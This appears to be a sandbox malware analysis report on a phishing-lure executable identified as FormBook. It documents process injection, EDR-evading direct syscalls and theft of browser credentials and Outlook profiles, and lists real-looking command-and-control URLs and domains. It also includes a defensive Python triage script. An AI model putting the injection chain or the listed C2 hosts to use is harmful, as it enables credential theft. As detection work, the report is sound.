                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01478B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01478B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0145EBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0143CBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013DEBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B8BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B8BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B8BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D0BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D0BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D0BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B0BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B0BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B0BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01464BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01464BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013ECA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D4A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D4A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013DEA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013ECA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0145EA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142CA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142CA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013ECA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013ECA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013ECA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0143CA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B6A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B6A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B6A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B6A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B6A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B6A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B6A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01406ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01406ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01406ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B8AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B8AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E8A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BEA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01484A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013EAAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013EAAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01406AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B0AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E4AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E4AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E4D1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013A6D10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013A6D10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013A6D10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01448D6B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013CAD00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013CAD00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\order confirmation.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe | Direct syscalls (call: Direct from address), in the order observed:
NtUnmapViewOfSection: 0x77462D3C
NtCreateMutant: 0x774635CC
NtWriteVirtualMemory: 0x77462E3C
NtMapViewOfSection: 0x77462D1C
NtResumeThread: 0x774636AC
NtProtectVirtualMemory: 0x77462F9C
NtSetInformationProcess: 0x77462C5C
NtSetInformationThread: 0x774563F9
NtNotifyChangeKey: 0x77463C2C
NtProtectVirtualMemory: 0x77457B2E
NtAllocateVirtualMemory: 0x77462BFC
NtQueryInformationProcess: 0x77462C26
NtResumeThread: 0x77462FBC
NtReadFile: 0x77462ADC
NtQuerySystemInformation: 0x77462DFC
NtDelayExecution: 0x77462DDC
NtAllocateVirtualMemory: 0x77463C9C
NtClose: 0x77462B6C
NtCreateUserProcess: 0x7746371C
NtWriteVirtualMemory: 0x7746490C
NtAllocateVirtualMemory: 0x774648EC
NtQuerySystemInformation: 0x774648CC
NtQueryVolumeInformationFile: 0x77462F2C
NtReadVirtualMemory: 0x77462E8C
NtCreateKey: 0x77462C6C
NtSetInformationThread: 0x77462B4C
NtQueryAttributesFile: 0x77462E6C
NtDeviceIoControlFile: 0x77462AEC
NtOpenSection: 0x77462E0C
NtCreateFile: 0x77462FEC
NtOpenFile: 0x77462DCC
NtQueryInformationToken: 0x77462CAC
NtTerminateThread: 0x77462FCC
NtAllocateVirtualMemory: 0x77462BEC
NtOpenKeyEx: 0x77462B9C
Source: C:\Users\user\Desktop\order confirmation.exe | Memory written: C:\Users\user\Desktop\order confirmation.exe base: 400000 value starts with: 4D5A (4D5A is the "MZ" header: a PE image is written at the default image base of a second instance of the sample)
Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: NULL target: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe protection: execute and read and write
Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: NULL target: C:\Windows\SysWOW64\SearchProtocolHost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: NULL target: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe protection: read write
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: NULL target: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Thread register set: target process: 1308
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Thread APC queued: target process: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
Source: C:\Users\user\Desktop\order confirmation.exe | Process created: C:\Users\user\Desktop\order confirmation.exe "C:\Users\user\Desktop\order confirmation.exe"
Source: C:\Users\user\Desktop\order confirmation.exe | Process created: C:\Users\user\Desktop\order confirmation.exe "C:\Users\user\Desktop\order confirmation.exe"
Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe | Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: XDBtzWJieMe.exe, 00000008.00000000.1896411434.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 00000008.00000002.2819879714.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000000.2060136726.0000000001070000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: XDBtzWJieMe.exe, 00000008.00000000.1896411434.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 00000008.00000002.2819879714.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000000.2060136726.0000000001070000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: XDBtzWJieMe.exe, 00000008.00000000.1896411434.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 00000008.00000002.2819879714.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000000.2060136726.0000000001070000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
Source: XDBtzWJieMe.exe, 00000008.00000000.1896411434.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 00000008.00000002.2819879714.0000000001470000.00000002.00000001.00040000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000000.2060136726.0000000001070000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\order confirmation.exe | Queries volume information: C:\Users\user\Desktop\order confirmation.exe VolumeInformation
Source: C:\Users\user\Desktop\order confirmation.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\order confirmation.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\order confirmation.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\order confirmation.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\order confirmation.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\order confirmation.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

Source: Yara match | File source: 4.2.order confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.order confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2823935651.0000000004EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1983228417.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2821333990.0000000003270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2821409903.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2820915719.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1984356146.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
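The two behaviours above that a responder turns into detections first are the injection chain (the "Section loaded" and "Process created" entries in the evasion section: sample into its dropped XDBtzWJieMe.exe and into SearchProtocolHost.exe, SearchProtocolHost.exe into XDBtzWJieMe.exe and firefox.exe) and the credential-store reads by SearchProtocolHost.exe, a Windows indexer component that has no business opening browser Login Data or the Outlook MAPI profile key. The script below is an added example, not Joe Sandbox code: it replays the events transcribed from this report and applies four triage rules. The trusted-directory list, the random-directory-name heuristic and the per-store owner list are this example's assumptions.

```python
"""Triage of the behaviour events in this report: injection chain and
credential-store access.

Added example, not Joe Sandbox code. EVENTS are transcribed from the report's
"Section loaded", "Process created", "File opened" and "Key opened" lines.
The rules (which directories count as OS binaries, what counts as a random
directory name, which processes may open which credential store) are this
example's assumptions, not something the report states.
"""
import re
from ntpath import basename, dirname

SAMPLE = r"C:\Users\user\Desktop\order confirmation.exe"
DROPPED = r"C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe"
SPH = r"C:\Windows\SysWOW64\SearchProtocolHost.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
CHROME = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
EDGE = r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default"

# (source image, event kind, target image / path, protection)
EVENTS = [
    (SAMPLE, "section", DROPPED, "execute and read and write"),
    (SAMPLE, "section", SPH, "execute and read and write"),
    (SPH, "section", DROPPED, "read write"),
    (SPH, "section", DROPPED, "execute and read and write"),
    (SPH, "section", FIREFOX, "read write"),
    (SPH, "section", FIREFOX, "execute and read and write"),
    (SAMPLE, "create", SAMPLE, ""),
    (SAMPLE, "create", SAMPLE, ""),
    (DROPPED, "create", SPH, ""),
    (SPH, "create", FIREFOX, ""),
    (SPH, "file", EDGE + r"\Login Data", ""),
    (SPH, "file", CHROME + r"\Network\Local State", ""),
    (SPH, "file", CHROME + r"\Cookies", ""),
    (SPH, "file", CHROME + r"\Web Data", ""),
    (SPH, "file", CHROME + r"\Network\Cookies", ""),
    (SPH, "file", CHROME + r"\Local State", ""),
    (SPH, "file", CHROME + r"\Login Data", ""),
    (SPH, "file", EDGE + r"\Network\Cookies", ""),
    (SPH, "registry",
     r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook", ""),
]

# Assumptions used by the rules below.
OS_DIRS = ("c:\\windows\\",)                  # images here are treated as trusted OS binaries
RANDOM_NAME = re.compile(r"^[A-Za-z]{20,}$")  # long, letters only, no separators
STORE_OWNERS = {                              # processes allowed to open each store
    "login data": {"chrome.exe", "msedge.exe"},
    "cookies": {"chrome.exe", "msedge.exe"},
    "web data": {"chrome.exe", "msedge.exe"},
    "local state": {"chrome.exe", "msedge.exe"},
}
MAPI_PROFILES = "windows messaging subsystem\\profiles"


def is_random_name(name):
    """Heuristic for dropper directories: long, letters only, mixed case."""
    return bool(RANDOM_NAME.match(name)) and not name.islower() and not name.isupper()


def injection_chain(events):
    """Cross-process executable section mappings as ordered, de-duplicated
    (source image, target image) edges; read-write-only mappings are skipped."""
    edges = []
    for src, kind, tgt, prot in events:
        if kind != "section" or "execute" not in prot or src.lower() == tgt.lower():
            continue
        edge = (basename(src), basename(tgt))
        if edge not in edges:
            edges.append(edge)
    return edges


def findings(events):
    """Apply the four triage rules; returns (rule, source image, detail) tuples."""
    out = []
    for src, kind, tgt, prot in events:
        src_name = basename(src).lower()
        if kind == "section" and "execute" in prot and tgt.lower().startswith(OS_DIRS):
            out.append(("rwx-section-into-os-binary", src_name, basename(tgt)))
        elif kind == "create" and is_random_name(basename(dirname(src))):
            out.append(("parent-in-random-dir", src_name, basename(dirname(src))))
        elif kind == "file":
            leaf = basename(tgt).lower()
            if leaf in STORE_OWNERS and src_name not in STORE_OWNERS[leaf]:
                out.append(("credential-store-read", src_name, leaf))
        elif kind == "registry" and MAPI_PROFILES in tgt.lower() and src_name != "outlook.exe":
            out.append(("mapi-profile-read", src_name, basename(tgt)))
    return out


def count(rule, events=EVENTS):
    """Number of findings for one rule."""
    return sum(1 for r, _, _ in findings(events) if r == rule)


if __name__ == "__main__":
    for edge in injection_chain(EVENTS):
        print("inject:", " -> ".join(edge))
    for finding in findings(EVENTS):
        print("finding:", *finding)
```

Run against this report's events, the script reproduces the four-edge injection chain and raises one RWX mapping into an OS binary, one process spawned from a random-looking directory under Program Files (x86), eight browser credential-store reads and one MAPI profile read. The same rules map onto Sysmon event IDs 1 (process create), 8/10 (remote thread and process access) and 11/13 for the file and registry reads, with the same owner lists as allow-list exceptions.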

                Remote Access Functionality

Source: Yara match | File source: 4.2.order confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.order confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2823935651.0000000004EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1983228417.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2821333990.0000000003270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2821409903.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2820915719.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1984356146.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Techniques with mapped signatures, per tactic; the number in parentheses is the count shown in the matrix cell. Tactics with no mapped technique (Reconnaissance, Resource Development, Initial Access, Execution, Lateral Movement, Exfiltration, Impact) are omitted.

Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (412); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (41); Process Injection (412); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1)
Discovery: Security Software Discovery (121); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (113)
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1)
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4)
Behavior Graph (ID 1575107; sample: order confirmation.exe; start date: 14/12/2024; architecture: WINDOWS; score: 100)

Top-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 5 other signatures
Top-level domains: phoenix88.sbs; www.phoenix88.sbs; 5 other IPs or domains

order confirmation.exe (started)
    dropped: C:\Users\user\...\order confirmation.exe.log (ASCII)
    signature: Injects a PE file into a foreign processes
    +-- order confirmation.exe (started)
    |   signature: Maps a DLL or memory area into another process
    |   +-- XDBtzWJieMe.exe (injected)
    |       signature: Found direct / indirect Syscall (likely to bypass EDR)
    |       +-- SearchProtocolHost.exe (started)
    |           signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
    |           +-- XDBtzWJieMe.exe (injected)
    |           |   network: phoenix88.sbs 88.99.61.52 (local ports 49815, 49821, 49829; HETZNER-ASDE, Germany); www.canadavinreport.site 185.27.134.206 (local ports 49777, 49785, 49794; WILDCARD-ASWildcardUKLimitedGB, United Kingdom); 3 other IPs or domains
    |           |   signature: Found direct / indirect Syscall (likely to bypass EDR)
    |           +-- firefox.exe (started)
    +-- order confirmation.exe (started)

Antivirus detection (submitted file)

Source | Detection | Scanner | Label
order confirmation.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
order confirmation.exe | 100% | Joe Sandbox ML | (no label)

Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches

Note that the ReversingLabs family label (AgentTesla) is a static verdict on the submitted .NET loader and disagrees with the Yara matches on the unpacked payload in memory, which identify FormBook; for attribution, use the in-memory Yara classification rather than the scanner label of the wrapper.
Antivirus detection (URLs)

URL | Detection | Scanner | Label
http://www.phoenix88.sbs/ogj2/?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9T9LUB2i2IiSBd7rmeCdeR22hTga1oxsx30/DDEHjEXz3Vw==&2VqtG=K0rLevU0Wh5tIJEp | 0% | Avira URL Cloud | safe
http://www.laohub10.net/8s5b/?KX=CIoU3XkQQhyfpcUgpw2pt4D5rFaewhtqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcYqRwUDZc0hQ5nlduAuRdjiHqVHSyH0yZGbg1OgG3wMBkWQ==&2VqtG=K0rLevU0Wh5tIJEp | 0% | Avira URL Cloud | safe
http://www.ana-silverco.shop/eaqq/?KX=NxubQmq32TFwA/AibIzR7zP/ZxBDpVn2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kYqX2P65hLvXSZ3fWNCCIV/k5d2IdbBS66sOXN5gLen/wBg==&2VqtG=K0rLevU0Wh5tIJEp | 0% | Avira URL Cloud | safe
http://www.ana-silverco.shop/eaqq/ | 0% | Avira URL Cloud | safe
http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/ps | 0% | Avira URL Cloud | safe
http://www.5tuohbpzyj9.buzz/abgi/ | 100% | Avira URL Cloud | malware
http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5 | 100% | Avira URL Cloud | malware
http://www.5tuohbpzyj9.buzz/abgi/?KX=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNtflpkpcb0CVjulSXUCscL7c5c6O3wfheXeqQy3IVMD/Pg==&2VqtG=K0rLevU0Wh5tIJEp | 100% | Avira URL Cloud | malware
http://www.ana-silverco.shop | 0% | Avira URL Cloud | safe
http://www.phoenix88.sbs/ogj2/ | 0% | Avira URL Cloud | safe
http://www.canadavinreport.site/4d2l/ | 100% | Avira URL Cloud | malware
http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMZMG6cjSawY9sklYa6FSt3/cXLdoz7lp+06E84XgU+l17w== | 100% | Avira URL Cloud | malware
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.ana-silverco.shop | 104.21.90.137 | true | false | (none) | high
r0lqcud7.nbnnn.xyz | 27.124.4.246 | true | false | (none) | high
